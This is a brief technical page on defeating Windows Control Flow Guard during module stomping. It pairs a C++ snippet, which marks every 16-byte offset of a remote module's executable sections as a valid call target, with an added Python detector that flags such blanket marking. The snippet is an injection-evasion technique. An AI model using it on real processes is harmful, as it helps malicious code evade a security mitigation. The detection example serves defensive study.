CFG

Control Flow Guard

CFG Bypasses for Module Stomping

Patch

Mark as Valid (SetProcessValidCallTargets)

Mark every 16-byte-aligned offset in the target module's executable sections as a valid call target:

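// Marks one offset as a valid CFG call target in the target process.
// info.Offset is interpreted relative to the base address passed to
// SetProcessValidCallTargets (targetModuleBase here).
void markCFGValid(unsigned long long ptrToMarkValid)
{
    CFG_CALL_TARGET_INFO info;
    info.Flags = CFG_CALL_TARGET_VALID;
    info.Offset = ptrToMarkValid;

    if (!SetProcessValidCallTargets_(targetProcess, targetModuleBase, sizeOfImage, 1, &info))
        throw std::exception("SetProcessValidCallTargets failed");
}

// Only executable sections are processed; CFG call targets are 16-byte
// aligned, so the section is walked in 16-byte steps.
if (srcSect.Characteristics & IMAGE_SCN_MEM_EXECUTE)
    for (unsigned int n = 0; n < srcSect.VirtualSize; n += 16)
        targetModule.markCFGValid(n);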
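
From the defender's side, the effect of this loop shows up as valid call targets that the image never declared. The added example below (not code from the original page) compares a module's on-disk Guard CF function table with a runtime snapshot of valid targets and flags blanket marking. The function names, the thresholds, the constructed sample data, and the sensor that collects the runtime snapshot are all assumptions.

```python
"""Added example: flag blanket CFG marking in an image-backed module (constructed data)."""
CFG_SLOT = 16  # the page's loop marks one call target per 16 bytes


def longest_run(offsets):
    """Length of the longest run of consecutive 16-byte slots in a sorted list."""
    best = run = 0
    prev = None
    for off in offsets:
        run = run + 1 if (prev is not None and off - prev == CFG_SLOT) else 1
        best = max(best, run)
        prev = off
    return best


def audit_cfg_targets(declared, observed, sections, run_limit=64, coverage_limit=0.5):
    """Compare runtime-valid offsets with the image's declared CFG targets.

    declared: RVAs listed in the on-disk Guard CF function table
    observed: RVAs valid at runtime (assumed to be collected by a sensor)
    sections: (name, rva, virtual_size, executable) tuples
    run_limit / coverage_limit: hypothetical thresholds, tune per environment
    """
    declared = set(declared)
    findings = []
    for name, rva, size, executable in sections:
        if not executable:
            continue  # the technique only touches executable sections
        in_sec = sorted(o for o in set(observed) if rva <= o < rva + size)
        undeclared = [o for o in in_sec if o not in declared]
        slots = max(1, (size + CFG_SLOT - 1) // CFG_SLOT)
        coverage = len(in_sec) / slots
        run = longest_run(undeclared)
        findings.append({
            "section": name,
            "undeclared": len(undeclared),
            "coverage": round(coverage, 3),
            "longest_run": run,
            "suspicious": run >= run_limit or coverage >= coverage_limit,
        })
    return findings


# Constructed sample: .text at RVA 0x1000, 0x2000 bytes, three declared functions.
SECTIONS = [(".text", 0x1000, 0x2000, True), (".rdata", 0x3000, 0x1000, False)]
DECLARED = [0x1000, 0x1040, 0x1230]
CLEAN = list(DECLARED)                           # runtime matches the image
BLANKET = list(range(0x1000, 0x3000, CFG_SLOT))  # every 16-byte slot valid
```

Legitimate modules declare only a sparse set of function entry points, so a long unbroken run of undeclared 16-byte slots is the signal here; the coverage ratio is a secondary check.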
